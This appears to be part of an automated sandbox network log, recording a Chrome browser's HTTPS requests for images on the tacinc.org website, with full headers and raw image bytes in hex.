                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              143192.168.2.649885141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC883OUTGET /wp-content/themes/tac-child/images/icon-close.svg HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650; cookielawinfo-checkbox-necessary=yes; cookielawinfo-checkbox-non-necessary=yes
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC435INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:14 GMT
                                                                                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 14:11:18 GMT
                                                                                                                                                                                                                              ETag: W/"66f56b86-d0"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614824
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5fbca8d465a-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC214INData Raw: 64 30 0d 0a 3c 73 76 67 20 65 6e 61 62 6c 65 2d 62 61 63 6b 67 72 6f 75 6e 64 3d 22 6e 65 77 20 2d 32 39 20 36 20 33 39 2e 36 20 34 30 22 20 76 69 65 77 42 6f 78 3d 22 2d 32 39 20 36 20 33 39 2e 36 20 34 30 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 6d 37 2e 39 20 31 30 2e 38 2d 32 2e 32 2d 32 2e 31 2d 31 35 20 31 35 2d 31 35 2d 31 35 2d 32 2e 31 20 32 2e 31 20 31 35 20 31 35 2d 31 35 20 31 35 20 32 2e 31 20 32 2e 32 20 31 35 2d 31 35 2e 31 20 31 35 20 31 35 2e 31 20 32 2e 32 2d 32 2e 32 2d 31 35 2d 31 35 7a 22 2f 3e 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: d0<svg enable-background="new -29 6 39.6 40" viewBox="-29 6 39.6 40" xmlns="http://www.w3.org/2000/svg"><path d="m7.9 10.8-2.2-2.1-15 15-15-15-2.1 2.1 15 15-15 15 2.1 2.2 15-15.1 15 15.1 2.2-2.2-15-15z"/></svg>
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              144192.168.2.649886141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC888OUTGET /wp-content/uploads/2023/05/featImg_Homecoming-2@1200x675px-768x432.png HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC572INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:14 GMT
                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                              Content-Length: 139360
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                              Cf-Polished: origFmt=png, origSize=145502
                                                                                                                                                                                                                              Content-Disposition: inline; filename="featImg_Homecoming-2@1200x675px-768x432.webp"
                                                                                                                                                                                                                              ETag: "64d5113e-2385e"
                                                                                                                                                                                                                              Last-Modified: Thu, 10 Aug 2023 16:33:02 GMT
                                                                                                                                                                                                                              Vary: Accept
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 613459
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5fbcfff2d3f-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC797INData Raw: 52 49 46 46 58 20 02 00 57 45 42 50 56 50 38 4c 4c 20 02 00 2f ff c2 6b 00 3f 06 39 b6 ed 34 d2 ff 62 a9 99 b9 13 e9 0c 27 ba d9 33 ac 18 85 06 fd 34 20 c7 b6 9b b0 d2 93 c3 cc 5c 4c fa 2f 20 3b 5a 25 9f d1 a4 d8 b2 61 db b6 64 48 ba 11 99 6d db dd cf 7e 9c ff ff 0f db 66 32 62 fe 83 1b d3 f4 2b 8c 19 53 f3 17 a3 95 35 5d 96 3c 34 21 6f 93 8b 54 2d fa 3d 6c fa 61 ba b7 86 3d 36 1e b2 f1 84 ac fa 41 6a 75 8d 16 c0 db 06 7f 56 a1 b5 64 a3 2b 7d 02 dd d5 4f 1d 58 f5 eb fc ff 4a 4e 11 39 c0 7f 23 23 e1 42 40 81 48 01 04 29 50 cd ba 92 d5 52 54 d5 69 44 95 1a 54 4f 62 fd 13 9e bf c0 95 95 10 d4 8e 17 9d 28 c5 e3 0e aa 14 b5 e5 17 0e 83 86 9f 85 b7 ba 1f b9 f5 fd d6 c4 7a 43 ba d5 81 54 22 a9 41 a3 6a 36 f9 77 6e fe 93 83 2f 93 4a a6 45 8c 15 60 5c e3 59 fd 55
                                                                                                                                                                                                                              Data Ascii: RIFFX WEBPVP8LL /k?94b'34 \L/ ;Z%adHm~f2b+S5]<4!oT-=la=6AjuVd+}OXJN9##B@H)PRTiDTOb(zCT"Aj6wn/JE`\YU
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: 99 06 01 91 b2 2a 74 cf 8c 53 85 d5 7b 35 9b 1d b6 73 ce 39 b8 aa 23 6d 49 96 00 11 a4 b8 04 80 20 25 c0 b1 c6 5d 61 23 a7 e5 ce e1 7f bd f7 75 dd cf 8b 34 db f7 fd de e1 89 e8 bf 2c da 56 db 56 ba ee 4d c1 7e 46 14 21 d9 c9 cc 97 6f 49 92 2c 49 92 6c eb 4b fa 7e fd d8 fe ea 74 66 12 eb ce 02 af 7c 54 6e 76 57 89 e8 bf 2c c8 b6 aa 56 3a 31 0f 11 70 e3 b8 dd e7 00 26 77 7e f9 6f db f6 bc 6d 24 c9 a2 7e da df 3a 1f d3 65 82 60 42 26 02 29 51 a4 e5 ea 36 39 49 e4 66 4f 4e 9b 63 f5 24 6a cc aa 32 80 4f b2 45 7c 04 05 80 00 44 a9 41 12 94 6c 80 f8 00 94 69 80 70 6f ce b1 76 aa fe af e7 79 de 8f 74 1f fb 07 bc f9 8d e8 bf 24 48 92 1c 45 4a 46 6b d8 ae e9 d2 3d 70 f7 f2 36 fd ff a6 36 92 b4 bd 8f 8d f5 76 45 4d f5 94 db 2e c9 2e 47 f7 f3 21 11 c9 34 52 d7 ee 43
                                                                                                                                                                                                                              Data Ascii: *tS{5s9#mI %]a#u4,VVM~F!oI,IlK~tf|TnvW,V:1p&w~om$~:e`B&)Q69IfONc$j2OE|DAlipovyt$HEJFk=p66vEM..G!4RC
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: 19 60 fd 85 c0 01 4f a8 c3 be bc 06 9d c2 48 ad 10 67 e6 07 27 c7 fe d8 02 2c f3 05 b6 d1 47 c5 38 37 18 f5 6d 5b b0 b2 26 a4 66 f8 78 d9 17 10 3d fe 90 df 67 73 57 ee cf b1 3d a1 c8 1b 6f d6 c1 cb 6d 40 c9 40 f5 40 dd 4b ca d9 8d 0a 9b 54 9c a4 65 8e df f4 f5 f8 5e eb ec b2 fd 8f 61 5f 33 dc 17 5e a3 61 fd 3a 0f 80 44 21 f9 a9 c3 f5 17 f0 5b 51 06 5d b3 32 56 8e d8 92 20 68 b6 08 f2 92 69 f7 32 7b d5 5f 04 84 67 c6 0f 60 d8 2d db 17 98 f6 1d 1f f4 e1 fb 85 9a be 92 e1 97 e4 a1 d9 d4 ee 3e 10 41 92 41 c5 20 6e 83 2a 06 13 93 80 54 70 57 f5 a8 ca 8a ec c6 6d 49 4e d6 72 af 81 9e a1 6e df ee 7d 4e c7 a0 42 09 e7 35 a2 39 87 d2 5f 0e 0f 3d 10 e5 b8 b1 f2 e2 72 40 1e d1 8c 87 32 3f 3c a6 ee e0 d1 63 43 9a 4c 5b df 23 89 e4 e1 33 f8 62 30 3f 21 ab 5a 5d b5 c1
                                                                                                                                                                                                                              Data Ascii: `OHg',G87m[&fx=gsW=om@@@KTe^a_3^a:D![Q]2V hi2{_g`->AA n*TpWmINrn}NB59_=r@2?<cCL[#3b0?!Z]
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: 90 00 a2 88 8f db 4b 8e 46 3e f5 aa 52 b6 76 c7 c2 26 ef 25 68 47 73 ce b3 9c f3 99 20 51 c8 28 8c 43 5d 06 75 8e 8c b8 5b c2 7c 47 d1 da b5 db 54 d6 67 32 4a 8d ce 39 ed 00 23 7c 6e ec 70 e1 89 cb a1 8c 06 62 d0 a1 73 98 6f 6a c7 ab 78 af f6 23 29 4a 87 4a d9 82 bb eb c7 72 fc 44 45 b4 ea 4d a5 92 63 0a 95 7e f2 ca 41 17 3b c1 8e 65 f4 16 9d 9c 65 b2 df 71 9b 47 df 62 01 43 40 ee f4 22 84 2b 55 e5 04 a9 2f 68 35 2b 61 f7 3e 67 09 c8 ea c5 8a ff eb 77 19 43 81 21 5f e1 70 ad 44 b6 24 f5 f3 24 77 2b 75 3c 99 73 3a 28 4e 3e 15 9a 1c e8 88 0c d1 fb b7 9a b0 c9 70 03 bc 01 d0 e1 0a 20 a4 f8 42 1b e5 c5 32 d4 43 bf a1 a5 5b fa 34 4a 59 bd 73 f7 2a a4 9d 43 92 34 4e bc 3a 34 3a f1 fe 76 2b 6d 94 43 5e 68 2c 6e 84 62 58 6b 85 68 74 ec 6f 81 63 69 20 69 7e db 30
                                                                                                                                                                                                                              Data Ascii: KF>Rv&%hGs Q(C]u[|GTg2J9#|npbsojx#)JJrDEMc~A;eeqGbC@"+U/h5+a>gwC!_pD$$w+u<s:(N>p B2C[4JYs*C4N:4:v+mC^h,nbXkhtoci i~0
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: fc 11 aa 0f b6 53 da df b9 5b 4b 8c 65 97 76 a7 14 02 51 89 e6 1d 87 2c a9 d7 c1 b0 e2 31 02 fc 6e 04 b2 6e 8f 9f 2e 01 a5 54 b0 a0 07 16 01 17 5d cc 29 06 c4 95 8f 00 42 25 00 e7 42 91 22 18 5f 6d 96 94 c4 b9 e0 60 d4 2b bb ad 28 f1 05 a5 e6 ba 1d 3b 51 1b c6 99 31 7e 78 d6 9f 04 ee d9 93 49 19 0f 7a a6 ee bd 6a 79 47 fb b9 92 88 e7 aa c2 92 30 51 5b 45 96 c5 1b 1e 0d 1e c9 d5 55 56 dc 3d 34 71 f3 e7 a1 22 64 60 11 42 7d e2 85 65 df 46 1f aa 39 69 66 a5 d8 e8 e1 0c 0b f0 4e b6 bf 83 34 eb 10 1e ea be ee 18 63 3a f0 70 ab 27 46 eb 3b d7 b1 6b f7 de 47 a0 93 ec bc 49 11 7b 1c e0 ab a9 00 d3 c9 96 41 4c 62 29 f6 8a 4c 98 d2 b1 d3 35 46 ba 96 d1 44 53 23 51 39 c8 bd 6c b7 c3 ad 42 3a 48 4a 9f 26 03 4b 50 e3 f1 6a 5f a3 50 07 98 f5 6b 5f 1e 4c d6 89 81 a6 22
                                                                                                                                                                                                                              Data Ascii: S[KevQ,1nn.T])B%B"_m`+(;Q1~xIzjyG0Q[EUV=4q"d`B}eF9ifN4c:p'F;kGI{ALb)L5FDS#Q9lB:HJ&KPj_Pk_L"
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: f6 33 bf de 14 22 aa b9 96 88 9f ec 3f 7f 42 02 8b ec 87 c4 2d e1 9e 0b d1 1f f9 b8 ec 10 d0 ca 4f 95 13 62 04 bf c2 fe 4e 82 63 37 7b 7a b6 99 19 ca e9 21 89 e1 b1 e1 bc f3 c1 2a de 33 b7 b3 36 1a 33 18 26 7f 2d c3 84 ea 98 50 d4 fc bd 5f 9f d9 ed 18 cd b1 3b b7 c3 fd ff f6 a5 9c b3 22 9a f3 1f 90 97 fb 53 a7 8f 43 78 13 f7 73 46 4c a9 ae 8c 1e 59 65 b8 e6 5e d2 b8 14 87 0f 17 b9 76 ce 1d 86 19 5c 5d ce 03 4f cb 16 0a da ed ed 4d cd 3f 95 20 cd 4b f3 df 1f 24 65 83 e2 dc 3c 9a 35 54 06 fb f8 52 03 52 ab 13 63 06 f5 20 1d 02 e6 a0 12 30 e3 36 95 55 bd c4 4a 07 94 33 f6 d1 02 7d 16 47 4f da 71 ee c9 e3 9e 4e 50 27 98 cf 0e ca 43 8f 8e be a7 e2 d0 79 50 c3 ae 20 e4 9c 66 a0 64 df 1e 84 fb 68 3b 0e ae e2 b7 c7 c0 2d cb e8 6c 88 6b 92 35 77 ac d1 1a 85 89 e7
                                                                                                                                                                                                                              Data Ascii: 3"?B-ObNc7{z!*363&-P_;"SCxsFLYe^v\]OM? K$e<5TRRc 06UJ3}GOqNP'CyP fdh;-lk5w
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: c1 5e a1 9d ca 03 2a 20 95 30 0d 68 de 74 de 30 b3 38 a3 d8 77 21 cf 69 c3 f5 8e 70 8a 6c a5 c9 19 75 85 b5 92 b6 6e 4d d8 2a 7b e4 e0 50 33 a1 75 e3 1d 7c ef f7 3d d8 c2 c6 85 b1 bf fd a7 6f 1f 9f 7a f5 09 11 98 20 be 09 cc 98 9a 07 d6 74 84 46 01 50 19 ab 21 21 14 c2 a3 c0 b4 8a 7d 0f 11 e8 4f 73 70 8e 66 04 2a e4 9d e7 e1 ad a8 64 4f 0e 52 90 f5 d6 53 32 4f 81 a2 4e 45 3b e4 f4 62 16 77 ba e3 66 18 69 88 28 1e a9 f5 0b fc a6 ac 25 e2 f6 d5 65 69 6b 0e 5c 2b 5a f5 d7 de f6 83 b9 ad ec ec f6 37 8f e8 49 54 48 bf 56 69 76 94 59 0b b9 90 27 06 3c 31 e8 27 00 57 8e 2f 63 94 10 8e 6c 83 37 7b 5d f3 16 33 45 d0 00 8c 68 50 45 4a 9b 96 a8 e9 7a d6 99 3c b0 e3 82 c4 51 39 c8 d6 e0 99 bd 83 a4 2c e4 79 be 70 74 66 ef 7e fa cd 21 da 8c 70 8e 18 f2 e0 25 76 d7 2c
                                                                                                                                                                                                                              Data Ascii: ^* 0ht08w!iplunM*{P3u|=oz tFP!!}Ospf*dORS2ONE;bwfi(%eik\+Z7ITHVivY'<1'W/cl7{]3EhPEJz<Q9,yptf~!p%v,
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: a6 68 5f 5d 80 50 32 51 8a 13 ce a5 45 9f b6 56 ee b7 7b b4 9a 68 6f a5 b0 23 9e 94 fd e1 c5 08 f8 57 06 e3 9b c9 bd a6 25 74 06 8c b2 76 6e 37 64 1e 80 6e 07 a5 7a 09 1d bd a8 67 64 55 a9 0c 66 f2 55 7b 16 0f 53 dc 21 08 44 ca 95 50 71 c1 c3 ac 02 38 04 20 41 59 dc 35 04 db 69 27 18 82 e9 82 6c 71 47 f7 70 be 33 74 4c bf f3 c3 5f b8 df 3c 9d 23 f0 d6 b7 dd 93 85 76 f5 09 5c 5a be 4a 22 71 70 7f 45 ea b0 f7 cc a0 df 52 30 68 23 be 0a 57 1c 66 5c b6 87 3a 67 c3 4a 36 cd 04 54 c1 1a 18 31 aa 34 fb 79 5d d3 bb c7 69 3b 4e 4a b2 ea a6 62 c7 6e 7d fc dd d8 70 63 7e 61 71 69 05 c2 8e 60 b3 c3 23 81 33 f0 8f 0c d9 47 92 bc d9 c3 3e c8 e8 60 42 c1 2a 2a d8 13 b5 84 6f d9 38 07 48 e8 27 0f 75 08 8f 7b 63 2c db f0 0c 6c a6 8a b0 54 42 f0 35 53 9a 77 16 94 d1 00 67
                                                                                                                                                                                                                              Data Ascii: h_]P2QEV{ho#W%tvn7dnzgdUfU{S!DPq8 AY5i'lqGp3tL_<#v\ZJ"qpER0h#Wf\:gJ6T14y]i;NJbn}pc~aqi`#3G>`B**o8H'u{c,lTB5Swg
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: 84 ea 02 95 87 53 27 37 ec 55 c2 29 ec 60 3c 2e b0 ce a5 e6 53 42 59 3f 35 96 73 6b 9e 2a 65 25 27 f3 66 07 76 63 e8 f1 e9 dc 47 db f9 27 9f fb c4 f2 20 b5 df bc d9 f6 ce bb 44 fa a1 b6 6c 41 c1 77 70 c3 06 25 39 56 9e 94 5e 7f 66 66 28 2e da 2e 52 8f d6 84 df 1d 5f 24 32 39 94 bd 64 2d 98 73 e9 0f e1 14 87 3e 55 d3 9b 3b 77 4d 01 1e 59 0e 67 b4 cb 82 df 7e a8 64 58 c9 df 79 f0 e3 07 33 bb 68 ea ae d2 b7 c5 3b ea 10 05 8a 52 ce 62 94 6f 50 3f bb 81 42 48 90 ed 3e 21 b3 2c 6d b0 ee 3d d1 68 a5 50 3d 66 d7 e0 4b f7 1e 6c a5 6e c7 a0 d4 11 b7 3b 41 d0 7c 8d 25 dd c9 05 34 16 cd c3 95 b7 31 2a 9c bb b2 18 47 10 02 38 1e 0a d7 44 c0 36 4f 2d ff 54 10 ff 8a 1f b0 e7 3f b5 1c f9 30 d4 52 cf 7d fe 44 49 22 81 77 6e 1e 66 aa 97 fd f7 ac 02 18 f7 7c 4b 61 81 95 91
                                                                                                                                                                                                                              Data Ascii: S'7U)`<.SBY?5sk*e%'fvcG' DlAwp%9V^ff(..R_$29d-s>U;wMYg~dXy3h;RboP?BH>!,m=hP=fKln;A|%41*G8D6O-T?0R}DI"wnf|Ka
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: 8d c0 d5 4a 85 5c 08 a8 a2 04 40 29 01 8e 18 c5 73 e0 af ea 7d f0 b6 d0 1a b7 24 56 30 2d c4 25 71 9b c3 4d c5 1b 21 25 42 77 69 93 d2 8e d7 a5 44 b7 26 b3 64 5e f6 5f 27 54 1d 30 21 e0 49 d9 d9 64 ef 8b 72 33 d4 4d 4c 1c d2 0c 02 0c 76 8c 66 f2 b6 15 3a 98 aa 10 1c 03 e1 78 41 bf 6a 25 ed ed 9f 60 4b a5 b1 50 48 90 82 bc d4 5d 12 3c 82 9b 3b 76 c3 b9 b4 b3 2f 19 35 25 17 3b b7 0e c4 dd 2c 7e 82 cb fe 40 a3 de 15 f8 00 d4 13 19 b4 55 0a 41 db 7b 0f 1d 90 8e e2 4a 8b c6 dc 1d 74 58 e8 f5 ce 10 7f 48 46 5d ca 5d 3c c8 a2 0b b2 ee 83 53 70 ca 27 e0 59 f9 a5 1b 9a c6 46 64 ca cf 79 85 6f 33 92 86 60 e6 99 0d 50 13 25 c2 af 44 10 b9 c4 08 f1 a7 3f fc 37 ee a8 f5 8e 37 bb a8 f5 7a 8f 54 21 c8 c0 81 06 f4 98 df 43 65 fd 6b 5c 56 37 f5 3e 78 7c ab b5 21 7d 83 c0
                                                                                                                                                                                                                              Data Ascii: J\@)s}$V0-%qM!%BwiD&d^_'T0!Idr3MLvf:xAj%`KPH]<;v/5%;,~@UA{JtXHF]]<Sp'YFdyo3`P%D?77zT!Cek\V7>x|!}


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              145192.168.2.649884141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC897OUTGET /wp-content/uploads/2022/10/Conrad_Medicaid_Mental_Health_Youth_3x2-367x266.jpeg HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:14 GMT
                                                                                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                                                                                              Content-Length: 18221
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                              Cf-Polished: origSize=18223
                                                                                                                                                                                                                              ETag: "66f4a4b3-472f"
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 00:02:59 GMT
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 613459
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5fbdaa10bbe-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC890INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 07 07 07 07 07 07 08 08 08 08 0b 0b 0a 0b 0b 10 0e 0d 0d 0e 10 18 11 12 11 12 11 18 24 16 1a 16 16 1a 16 24 20 26 1f 1d 1f 26 20 39 2d 27 27 2d 39 42 37 34 37 42 4f 47 47 4f 64 5f 64 83 83 b0 01 07 07 07 07 07 07 08 08 08 08 0b 0b 0a 0b 0b 10 0e 0d 0d 0e 10 18 11 12 11 12 11 18 24 16 1a 16 16 1a 16 24 20 26 1f 1d 1f 26 20 39 2d 27 27 2d 39 42 37 34 37 42 4f 47 47 4f 64 5f 64 83 83 b0 ff c2 00 11 08 01 0a 01 6f 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 02 03 04 06 07 01 00 08 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 82 eb 0f 48 fb b1 96 12 56 cb c1 d5 25 43
                                                                                                                                                                                                                              Data Ascii: JFIF$$ && 9-''-9B747BOGGOd_d$$ && 9-''-9B747BOGGOd_do"4HV%C
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: 79 d7 48 d8 6c bf ae b1 8a 2b f7 88 e8 c3 ac d1 7a 7c c2 78 f6 d8 41 d7 f0 37 d3 00 bd 93 16 54 f6 86 7c 40 42 e1 90 19 59 06 a6 d6 76 87 34 ac a7 49 a8 3d 8f 5e b3 6a 99 96 fa 1e 85 be 6f b4 a6 bd 2e 3a 45 78 c8 6f 9e f5 e4 f5 b5 69 94 66 96 85 72 57 21 81 70 fd 50 f4 57 2e 99 7e cd 45 4a da ce 61 9e da 58 4b f0 ed 72 af e7 5f 4c 7c c9 59 9d 79 cd 2f 1f 4a 82 02 fd 5c 2e ab b7 63 1f 41 69 e7 55 61 ec bf 28 06 89 42 97 19 cc 06 23 5b 27 4d a3 e6 7d 67 29 79 eb f2 60 cb bc c4 06 02 57 9f 7b 35 60 8d 7b 68 93 a1 67 5a 4c b8 d9 ce 97 9a 5c 72 f7 9f de ba f9 e6 7a 3a 7d 2e 3a 90 0b 55 57 e7 7d 89 1e 92 8d 32 92 1c d4 29 b1 52 13 d0 96 f3 76 38 b8 3a 26 79 be ba 97 5b 98 6f 4c af 7e 9c 18 30 9c 73 43 ce 62 cd 08 f3 0d 9d 70 4c d9 ea 87 a7 d2 9d 78 e9 78 51 41
                                                                                                                                                                                                                              Data Ascii: yHl+z|xA7T|@BYv4I=^jo.:ExoifrW!pPW.~EJaXKr_L|Yy/J\.cAiUa(B#['M}g)y`W{5`{hgZL\rz:}.:UW}2)Rv8:&y[oL~0sCbpLxxQA
